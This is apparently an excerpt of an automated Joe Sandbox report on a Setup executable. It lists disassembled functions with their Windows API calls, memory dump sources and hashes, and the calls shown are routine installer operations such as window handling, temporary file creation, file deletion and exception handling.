                                                                                              • Instruction Fuzzy Hash: 41F0C83540930DAEFF08EB64CC45AAE7BB9EF83F58F250419E83096281DB70CA05CE90
                                                                                              Function 63956ABD Relevance: 6.0, APIs: 4, Instructions: 44windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 63956ACE
                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 63956AE8
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 63956AF1
                                                                                              • SendMessageW.USER32(00000000,000000F7,00000001,?), ref: 63956B1E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnableItemMessageSendShow
                                                                                              • String ID:
                                                                                              • API String ID: 1246583984-0
                                                                                              • Opcode ID: f522096dd76b2609451dfc9d63f618e06e6bc7c8872b27be8e9cd7d05ef02c48
                                                                                              • Instruction ID: 521fca7d7a649b7302d2f5441ed718599d4fb7ebad15d368558957441f17f970
                                                                                              • Opcode Fuzzy Hash: f522096dd76b2609451dfc9d63f618e06e6bc7c8872b27be8e9cd7d05ef02c48
                                                                                              • Instruction Fuzzy Hash: 1B018175205305BFDB10EF64CC88EAA7BACEF0ABA4F044051F9069B651DB71E860CF90
                                                                                              Function 6C5E9F68 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 6C5E9F81
                                                                                                • Part of subcall function 6C5E9F36: ??0exception@@QAE@ABV0@@Z.MSVCRT(6C5E44B1), ref: 6C5E9F41
                                                                                              • _CxxThrowException.MSVCRT(?,6C5EE290), ref: 6C5E9F8F
                                                                                              • ??1exception@@UAE@XZ.MSVCRT ref: 6C5E9FA8
                                                                                              • free.MSVCRT ref: 6C5E9FB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@@??1exception@@ExceptionThrowV0@@freestd::bad_exception::bad_exception
                                                                                              • String ID:
                                                                                              • API String ID: 2985545613-0
                                                                                              • Opcode ID: 137dd88983a014af70a6be4a0fdc2d65c33f320c4efe2e2ec15765e1668b7b7b
                                                                                              • Instruction ID: d77b2f1dd7d2551865a972ad15d052fb8e4fb41f17bc6bbbed752775f640cd6c
                                                                                              • Opcode Fuzzy Hash: 137dd88983a014af70a6be4a0fdc2d65c33f320c4efe2e2ec15765e1668b7b7b
                                                                                              • Instruction Fuzzy Hash: 94E0E57380524C76C309AAB86C05DCBBFAC5F8A324F114166E92453A01AB70DD4881E8
                                                                                              Function 6394EB19 Relevance: 6.0, APIs: 4, Instructions: 38threadwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6394E7D4: GetThreadLocale.KERNEL32(?,?,6394EB27), ref: 6394E7DE
                                                                                                • Part of subcall function 6394E7D4: GetThreadLocale.KERNEL32(?,?,6394EB27), ref: 6394E7ED
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6394EB3A
                                                                                              • SetWindowsHookExW.USER32(00000005,Function_0000EAF4,00000000,00000000), ref: 6394EB4A
                                                                                              • MessageBoxW.USER32(?,?,?), ref: 6394EB5D
                                                                                              • UnhookWindowsHookEx.USER32(?), ref: 6394EB6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$HookLocaleWindows$CurrentMessageUnhook
                                                                                              • String ID:
                                                                                              • API String ID: 3998944487-0
                                                                                              • Opcode ID: e299472f9e4f713cd9697f22e87aaec6cb7ce44ea1fb5b7ef89ded5f2860840b
                                                                                              • Instruction ID: 4aa280b7e70018d7d17d8a6f5148464376104630508200c00c106f232032bedc
                                                                                              • Opcode Fuzzy Hash: e299472f9e4f713cd9697f22e87aaec6cb7ce44ea1fb5b7ef89ded5f2860840b
                                                                                              • Instruction Fuzzy Hash: 29F06236A00301AFDB10AF66CD08F5A7BE9EF86BA2F014429F969D7542D771D421CF20
                                                                                              Function 63971EFE Relevance: 6.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(63982FA0,63982F8C,?,?,6395EFB9,00000000,?,?,?,?,?,6395E923,?,-00000010), ref: 63971F0B
                                                                                              • LeaveCriticalSection.KERNEL32(63982FA0,?,6395EFB9,00000000,?,?,?,?,?,6395E923,?,-00000010), ref: 63971F27
                                                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,6395EFB9,00000000,?,?,?,?,?,6395E923,?,-00000010), ref: 63971F46
                                                                                              • LeaveCriticalSection.KERNEL32(63982FA0,?,6395EFB9,00000000,?,?,?,?,?,6395E923,?,-00000010), ref: 63971F4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$EnterExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 799838862-0
                                                                                              • Opcode ID: f679fbf8728d132f66f821bb2e3491bdbc83f03a302acb3d734b4f733b084a1b
                                                                                              • Instruction ID: f526490ec9f0dd822eabb6e9ed899c237edabac5eb132c3a473cdb0102981839
                                                                                              • Opcode Fuzzy Hash: f679fbf8728d132f66f821bb2e3491bdbc83f03a302acb3d734b4f733b084a1b
                                                                                              • Instruction Fuzzy Hash: E7F0BB36348600ABD7306E56DC54B5A7779EB87B61F000419FE05DB582C770F8038F60
                                                                                              Function 6C5E9F75 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 6C5E9F81
                                                                                                • Part of subcall function 6C5E9F36: ??0exception@@QAE@ABV0@@Z.MSVCRT(6C5E44B1), ref: 6C5E9F41
                                                                                              • _CxxThrowException.MSVCRT(?,6C5EE290), ref: 6C5E9F8F
                                                                                              • ??1exception@@UAE@XZ.MSVCRT ref: 6C5E9FA8
                                                                                              • free.MSVCRT ref: 6C5E9FB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@@??1exception@@ExceptionThrowV0@@freestd::bad_exception::bad_exception
                                                                                              • String ID:
                                                                                              • API String ID: 2985545613-0
                                                                                              • Opcode ID: e891a55a0fc48c4f16d7da1621e7b2aaf2d7a381ce334ff91b82e4175d554959
                                                                                              • Instruction ID: faa1a38d3fcf7a55a88d300818612af6349b797728a68eb75e6daf81a9fa835f
                                                                                              • Opcode Fuzzy Hash: e891a55a0fc48c4f16d7da1621e7b2aaf2d7a381ce334ff91b82e4175d554959
                                                                                              • Instruction Fuzzy Hash: B4E0927340420C72C315AAB99C05DCBBBAC9F89324F204425B92453A009B709D4881E4
                                                                                              Function 6395200C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63952013
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Name$Size
                                                                                              • API String ID: 431132790-481755742
                                                                                              • Opcode ID: f96f6186bc0b50091939dff037117c2ce916b0f3c86913b56495eedde7deb410
                                                                                              • Instruction ID: edb2e0cd0e91ceb7f2b93de59eb6272c8d47f709cd82fb390efbb6338f7e693c
                                                                                              • Opcode Fuzzy Hash: f96f6186bc0b50091939dff037117c2ce916b0f3c86913b56495eedde7deb410
                                                                                              • Instruction Fuzzy Hash: F5415B71900349DFEF01DBA8C944BDEBBB8AF16B28F144188E564A7281D774DA45CF61
                                                                                              Function 6C5EB21B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcschr
                                                                                              • String ID: \\?\
                                                                                              • API String ID: 1497570035-4282027825
                                                                                              • Opcode ID: d82803e0e394e91c6f5a7786c63dc4a791da59d93c093dd7d165481067c44f13
                                                                                              • Instruction ID: c6544fc8a06c938826ad3cd1efd08687e928b6f31a07b84e4bf8653c4f319a6d
                                                                                              • Opcode Fuzzy Hash: d82803e0e394e91c6f5a7786c63dc4a791da59d93c093dd7d165481067c44f13
                                                                                              • Instruction Fuzzy Hash: 313139339007229AD711BF698C4099F33B4EF4D36A7154A25DD96ABA40E761DE4183D8
                                                                                              Function 6C5D30E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ctype$malloc
                                                                                              • String ID: W
                                                                                              • API String ID: 624949309-655174618
                                                                                              • Opcode ID: 7f0c1b1a179a3b09a6a19488affd130c8792208395edcda6b02c07f58ac75aa6
                                                                                              • Instruction ID: bcfca71ca0e8c43e3f255bce2a523c6e0b9587f95cb7a9c1fdd39fe63bb8d24d
                                                                                              • Opcode Fuzzy Hash: 7f0c1b1a179a3b09a6a19488affd130c8792208395edcda6b02c07f58ac75aa6
                                                                                              • Instruction Fuzzy Hash: 00313AB5601706EFD708CF9DD840A6AB7B6EF89325B22846DD4198BB50CB70AD018B58
                                                                                              Function 6C5E98D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              • Opcode ID: 34b4632df41b71c6c06f666a0b55d6c05211fbd2944f5d5382c45332ec31b13c
                                                                                              • Instruction ID: 86e210626eb46487b860aec53369eb617426bb1a590a1f6e2ed5d449bfd8a4ca
                                                                                              • Opcode Fuzzy Hash: 34b4632df41b71c6c06f666a0b55d6c05211fbd2944f5d5382c45332ec31b13c
                                                                                              • Instruction Fuzzy Hash: 2921B03660420AEADB018F0ACC44BE77775EB8A714F198115F995DBA90E774DA91C7C0
                                                                                              Function 6C5E877C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTrace
                                                                                              • String ID: <NULL>$NULL
                                                                                              • API String ID: 471583391-888386124
                                                                                              • Opcode ID: 8329f820a907adae909bf6cee2465ed3ad63584b2e5e91d10b34429b5a3b159e
                                                                                              • Instruction ID: 717d052db33ec03af94539f71f4092bf16807b44c4ca58fa099d9c814fdacef9
                                                                                              • Opcode Fuzzy Hash: 8329f820a907adae909bf6cee2465ed3ad63584b2e5e91d10b34429b5a3b159e
                                                                                              • Instruction Fuzzy Hash: AA21D13564820A9FDB058F0ECC04BA33776EB8D718F198517F9108BA90EB75D991CB82
                                                                                              Function 63967ACF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 63967AFC
                                                                                                • Part of subcall function 63967F08: GetLastError.KERNEL32(63967B0B,?,?,?,00000000), ref: 63967F08
                                                                                              • GetTempFileNameW.KERNEL32(?,TFR,00000000,?,?,?,?,00000000), ref: 63967B54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Temp$ErrorFileLastNamePath
                                                                                              • String ID: TFR
                                                                                              • API String ID: 3373471080-3081930533
                                                                                              • Opcode ID: 954d3c703b85115128e866cd4bda808a60c6885e1850764380a356a184ec93cf
                                                                                              • Instruction ID: 26b4b6d0668f001bc55c21d620b7211b857e83b01151784b098662a3314fece7
                                                                                              • Opcode Fuzzy Hash: 954d3c703b85115128e866cd4bda808a60c6885e1850764380a356a184ec93cf
                                                                                              • Instruction Fuzzy Hash: A321C5B1A01318AAFB10DB64CC45FDE73ACAB06B14F5046A9F224E71C1DB70DA848F65
                                                                                              Function 6C5E9AFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,?,V.^l,00000000,00000000,?,00000000,?,6C5E2E56,?,?,00000100,?), ref: 6C5E9B37
                                                                                              • GetLastError.KERNEL32(?,6C5E2E56,?,?,00000100,?,?,00000000), ref: 6C5E9B49
                                                                                                • Part of subcall function 6C5E99F8: EtwTraceMessage.NTDLL ref: 6C5E9A13
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharErrorLastMessageMultiTraceWide
                                                                                              • String ID: V.^l
                                                                                              • API String ID: 1881890961-2647505185
                                                                                              • Opcode ID: 1cf022cfa5908ec4e416fcdb007a97c23480fe6b78a7ca975f381830d9a59680
                                                                                              • Instruction ID: 07a4a69af00a664a6d42692270eaaf76a6216b1eeb1bbf9a1c18f63082980165
                                                                                              • Opcode Fuzzy Hash: 1cf022cfa5908ec4e416fcdb007a97c23480fe6b78a7ca975f381830d9a59680
                                                                                              • Instruction Fuzzy Hash: 93113432225284AFDB117E648C84EE77BACEF4D358B510458F461CBA22D372CC40CB50
                                                                                              Function 63953654 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395365B
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Hide$Text
                                                                                              • API String ID: 431132790-3852183071
                                                                                              • Opcode ID: d92f08a3eb5542df832a06b2feebb4d268625a95f6a3273a193f9254716dd427
                                                                                              • Instruction ID: ab5b9fcf225123eb5e81f246cde79c2885b7073c442530b59a6fa1ed07b59b09
                                                                                              • Opcode Fuzzy Hash: d92f08a3eb5542df832a06b2feebb4d268625a95f6a3273a193f9254716dd427
                                                                                              • Instruction Fuzzy Hash: 9F211D71901249DFDF10DBB8C944BDEB7B8AF29B28F188059E454AB382D735EA44CF61
                                                                                              Function 639560C9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639560D0
                                                                                                • Part of subcall function 6395396A: __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 63955ECE: __EH_prolog3.LIBCMT ref: 63955ED5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: Uninstall$UninstallPatch
                                                                                              • API String ID: 431132790-3176843842
                                                                                              • Opcode ID: 456c12fd6ccfa55af24c29464e1e9a5a759a69527a75d9043313e3c6086ac2a7
                                                                                              • Instruction ID: 1e63918d663239d90d70992f2631d58ddba8976af1843133c25f44cc440f772e
                                                                                              • Opcode Fuzzy Hash: 456c12fd6ccfa55af24c29464e1e9a5a759a69527a75d9043313e3c6086ac2a7
                                                                                              • Instruction Fuzzy Hash: 15212A71900248EFDF01DBA8C944BDEB7B8AF19728F148489F555E7282C735DA54CB21
                                                                                              Function 6394F0C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394F0CF
                                                                                                • Part of subcall function 6395F21D: _wcsnlen.LIBCMT ref: 6395F1B2
                                                                                              • DeleteFileW.KERNEL32(00000000,00000010,HFI,00000000,00000000,639479E4,00000004,639657E2,?,?,?,?,?,?,00000024,6394F18B), ref: 6394F14B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFileH_prolog3_wcsnlen
                                                                                              • String ID: HFI
                                                                                              • API String ID: 1332513528-686494941
                                                                                              • Opcode ID: 36cfb3da4773fda5091ecde9ffd033cb265f6dec2626122e9d392888dd905f08
                                                                                              • Instruction ID: 8afade3a8d4e320b8c96469dcfb4259e000b84b2ffe5d55826665c183da311b4
                                                                                              • Opcode Fuzzy Hash: 36cfb3da4773fda5091ecde9ffd033cb265f6dec2626122e9d392888dd905f08
                                                                                              • Instruction Fuzzy Hash: EA11C2713052049FEB18DF78C9446AEB7E4AF2BF2CF040216E462AB2D2C770D9458F91
                                                                                              Function 6396383E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcsnlen.LIBCMT ref: 63963871
                                                                                              • _memcpy_s.LIBCMT ref: 639638A7
                                                                                                • Part of subcall function 639683CE: __CxxThrowException@8.LIBCMT ref: 639683E2
                                                                                              Strings
                                                                                              • GetProcessImageFileNameW, xrefs: 63963845
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception@8Throw_memcpy_s_wcsnlen
                                                                                              • String ID: GetProcessImageFileNameW
                                                                                              • API String ID: 31407445-2183627785
                                                                                              • Opcode ID: 16ce1bf133e5998bdae5199f96e5951c79e569a8ed18c95554b6108aeda2db8e
                                                                                              • Instruction ID: f381b4656a77603d396736ab66f17570a53bf2ba91394a1b6a62858313123510
                                                                                              • Opcode Fuzzy Hash: 16ce1bf133e5998bdae5199f96e5951c79e569a8ed18c95554b6108aeda2db8e
                                                                                              • Instruction Fuzzy Hash: C0018432A05204BFEB04DF79CC89C9E77E9DA967A4715852DF4199B250EA30EA41CF90
